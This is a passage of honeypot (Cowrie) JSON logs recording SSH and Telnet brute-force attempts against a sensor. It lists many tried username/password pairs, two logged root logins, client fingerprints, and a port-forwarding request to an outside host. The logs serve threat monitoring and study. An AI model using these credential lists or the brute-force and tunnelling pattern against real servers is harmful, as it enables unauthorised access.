57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:34:40.564357Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.login.failed","username":"user","password":"sooner","message":"login attempt [user/sooner] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:40.984089Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.login.failed","username":"user","password":"shitty","message":"login attempt [user/shitty] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:42.097580Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.login.failed","username":"user","password":"sasha1","message":"login attempt [user/sasha1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:43.184459Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":38850,"dst_ip":"1.2.3.4","dst_port":22,"session":"c827fa146461","protocol":"ssh","message":"New connection: 77.83.240.46:38850 (1.2.3.4:22) [session: c827fa146461]","sensor":"my-vps","timestamp":"2025-08-28T04:34:43.964255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:34:43.965326Z","src_ip":"77.83.240.46","session":"c827fa146461"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T04:34:43.978394Z","src_ip":"77.83.240.46","session":"c827fa146461"}
{"eventid":"cowrie.login.failed","username":"loginuser","password":"1234567","message":"login attempt [loginuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:44.021778Z","src_ip":"77.83.240.46","session":"c827fa146461"}
{"eventid":"cowrie.login.failed","username":"user","password":"pooh","message":"login attempt [user/pooh] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:44.293210Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:34:45.040570Z","src_ip":"77.83.240.46","session":"c827fa146461"}
{"eventid":"cowrie.login.failed","username":"user","password":"pineappl","message":"login attempt [user/pineappl] failed","sensor":"my-vps","timestamp":"2025-08-28T04:34:45.390900Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21032,"dst_ip":"1.2.3.4","dst_port":23,"session":"007218407edb","protocol":"telnet","message":"New connection: 212.227.125.160:21032 (1.2.3.4:23) [session: 007218407edb]","sensor":"my-vps","timestamp":"2025-08-28T04:34:45.764668Z"}
{"eventid":"cowrie.session.closed","duration":0.0012273788452148438,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:34:45.765819Z","src_ip":"212.227.125.160","session":"007218407edb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21038,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f8d1583e70f","protocol":"telnet","message":"New connection: 212.227.125.160:21038 (1.2.3.4:23) [session: 9f8d1583e70f]","sensor":"my-vps","timestamp":"2025-08-28T04:34:46.084102Z"}
{"eventid":"cowrie.session.closed","duration":0.0013835430145263672,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:34:46.085378Z","src_ip":"212.227.125.160","session":"9f8d1583e70f"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:34:46.503817Z","src_ip":"212.227.125.160","session":"68618a69e82f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63848,"dst_ip":"1.2.3.4","dst_port":22,"session":"e24d6f432664","protocol":"ssh","message":"New connection: 217.72.205.35:63848 (1.2.3.4:22) [session: e24d6f432664]","sensor":"my-vps","timestamp":"2025-08-28T04:34:55.967287Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:34:55.968538Z","src_ip":"217.72.205.35","session":"e24d6f432664"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38211,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cd386b15784","protocol":"ssh","message":"New connection: 212.227.125.160:38211 (1.2.3.4:22) [session: 7cd386b15784]","sensor":"my-vps","timestamp":"2025-08-28T04:35:38.512425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:35:38.513401Z","src_ip":"212.227.125.160","session":"7cd386b15784"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:35:38.596093Z","src_ip":"212.227.125.160","session":"7cd386b15784"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-28T04:35:39.007694Z","src_ip":"212.227.125.160","session":"7cd386b15784"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:35:40.119026Z","src_ip":"212.227.125.160","session":"7cd386b15784"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51802,"dst_ip":"1.2.3.4","dst_port":22,"session":"5840c4c9e4b1","protocol":"ssh","message":"New connection: 212.227.235.229:51802 (1.2.3.4:22) [session: 5840c4c9e4b1]","sensor":"my-vps","timestamp":"2025-08-28T04:38:31.885079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:38:31.887588Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:38:31.994077Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bravehea","message":"login attempt [admin/bravehea] failed","sensor":"my-vps","timestamp":"2025-08-28T04:38:32.464747Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bookcase","message":"login attempt [admin/bookcase] failed","sensor":"my-vps","timestamp":"2025-08-28T04:38:33.575411Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blunted","message":"login attempt [admin/blunted] failed","sensor":"my-vps","timestamp":"2025-08-28T04:38:34.685004Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"blackcock","message":"login attempt [admin/blackcock] failed","sensor":"my-vps","timestamp":"2025-08-28T04:38:35.795044Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biker1","message":"login attempt [admin/biker1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:38:36.904667Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:38:38.014024Z","src_ip":"212.227.235.229","session":"5840c4c9e4b1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45752,"dst_ip":"1.2.3.4","dst_port":23,"session":"13c1628df48a","protocol":"telnet","message":"New connection: 212.227.235.229:45752 (1.2.3.4:23) [session: 13c1628df48a]","sensor":"my-vps","timestamp":"2025-08-28T04:39:46.744344Z"}
{"eventid":"cowrie.session.closed","duration":30.727526664733887,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:40:17.471802Z","src_ip":"212.227.235.229","session":"13c1628df48a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62066,"dst_ip":"1.2.3.4","dst_port":22,"session":"2127a4d4a871","protocol":"ssh","message":"New connection: 217.72.205.35:62066 (1.2.3.4:22) [session: 2127a4d4a871]","sensor":"my-vps","timestamp":"2025-08-28T04:41:28.686469Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:41:28.687612Z","src_ip":"217.72.205.35","session":"2127a4d4a871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":31208,"dst_ip":"1.2.3.4","dst_port":22,"session":"350c33684ada","protocol":"ssh","message":"New connection: 212.227.235.229:31208 (1.2.3.4:22) [session: 350c33684ada]","sensor":"my-vps","timestamp":"2025-08-28T04:44:04.469626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:44:04.470781Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:44:04.601726Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.login.failed","username":"david","password":"david","message":"login attempt [david/david] failed","sensor":"my-vps","timestamp":"2025-08-28T04:44:05.212268Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc123","message":"login attempt [david/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:44:06.342012Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd123","message":"login attempt [david/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:44:07.472500Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd1234","message":"login attempt [david/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T04:44:08.603497Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc1234","message":"login attempt [david/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T04:44:09.733635Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:44:10.864226Z","src_ip":"212.227.235.229","session":"350c33684ada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54524,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ab77c9b9dd0","protocol":"ssh","message":"New connection: 212.227.125.160:54524 (1.2.3.4:22) [session: 2ab77c9b9dd0]","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.254420Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.255549Z","src_ip":"212.227.125.160","session":"2ab77c9b9dd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54793,"dst_ip":"1.2.3.4","dst_port":22,"session":"41a5b7569dad","protocol":"ssh","message":"New connection: 212.227.125.160:54793 (1.2.3.4:22) [session: 41a5b7569dad]","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.370163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.372195Z","src_ip":"212.227.125.160","session":"41a5b7569dad"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.486419Z","src_ip":"212.227.125.160","session":"41a5b7569dad"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:44:49.946705Z","src_ip":"212.227.125.160","session":"41a5b7569dad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T04:44:50.062587Z","session":"41a5b7569dad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54361,"dst_ip":"1.2.3.4","dst_port":23,"session":"aa1aba610644","protocol":"telnet","message":"New connection: 212.227.125.160:54361 (1.2.3.4:23) [session: aa1aba610644]","sensor":"my-vps","timestamp":"2025-08-28T04:45:10.109839Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":63852,"dst_ip":"1.2.3.4","dst_port":22,"session":"d92addca7925","protocol":"ssh","message":"New connection: 80.94.95.15:63852 (1.2.3.4:22) [session: d92addca7925]","sensor":"my-vps","timestamp":"2025-08-28T04:45:12.576068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:45:12.577852Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:45:13.261820Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage","message":"login attempt [sage/sage] failed","sensor":"my-vps","timestamp":"2025-08-28T04:45:13.568316Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1","message":"login attempt [sage/sage1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:45:14.963133Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage123","message":"login attempt [sage/sage123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:45:16.058096Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1234","message":"login attempt [sage/sage1234] failed","sensor":"my-vps","timestamp":"2025-08-28T04:45:17.152692Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage12345","message":"login attempt [sage/sage12345] failed","sensor":"my-vps","timestamp":"2025-08-28T04:45:18.248468Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:19.342731Z","src_ip":"80.94.95.15","session":"d92addca7925"}
{"eventid":"cowrie.session.closed","duration":12.61959981918335,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:22.729374Z","src_ip":"212.227.125.160","session":"aa1aba610644"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54696,"dst_ip":"1.2.3.4","dst_port":23,"session":"93458cfa2154","protocol":"telnet","message":"New connection: 212.227.125.160:54696 (1.2.3.4:23) [session: 93458cfa2154]","sensor":"my-vps","timestamp":"2025-08-28T04:45:22.916852Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56266,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bddadb8f7e0","protocol":"ssh","message":"New connection: 212.227.125.160:56266 (1.2.3.4:22) [session: 3bddadb8f7e0]","sensor":"my-vps","timestamp":"2025-08-28T04:45:24.438924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:45:24.439881Z","src_ip":"212.227.125.160","session":"3bddadb8f7e0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:45:24.605506Z","src_ip":"212.227.125.160","session":"3bddadb8f7e0"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:45:25.111024Z","src_ip":"212.227.125.160","session":"3bddadb8f7e0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:25.278028Z","src_ip":"212.227.125.160","session":"3bddadb8f7e0"}
{"eventid":"cowrie.session.closed","duration":12.833974123001099,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:45:35.750757Z","src_ip":"212.227.125.160","session":"93458cfa2154"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55023,"dst_ip":"1.2.3.4","dst_port":23,"session":"4394f2de9cfb","protocol":"telnet","message":"New connection: 212.227.125.160:55023 (1.2.3.4:23) [session: 4394f2de9cfb]","sensor":"my-vps","timestamp":"2025-08-28T04:45:35.961810Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42126,"dst_ip":"1.2.3.4","dst_port":23,"session":"d3f6fd7c2878","protocol":"telnet","message":"New connection: 212.227.235.229:42126 (1.2.3.4:23) [session: d3f6fd7c2878]","sensor":"my-vps","timestamp":"2025-08-28T04:45:44.588880Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56888,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad01b7eecee8","protocol":"ssh","message":"New connection: 212.227.235.229:56888 (1.2.3.4:22) [session: ad01b7eecee8]","sensor":"my-vps","timestamp":"2025-08-28T04:45:46.513341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:45:46.514238Z","src_ip":"212.227.235.229","session":"ad01b7eecee8"}
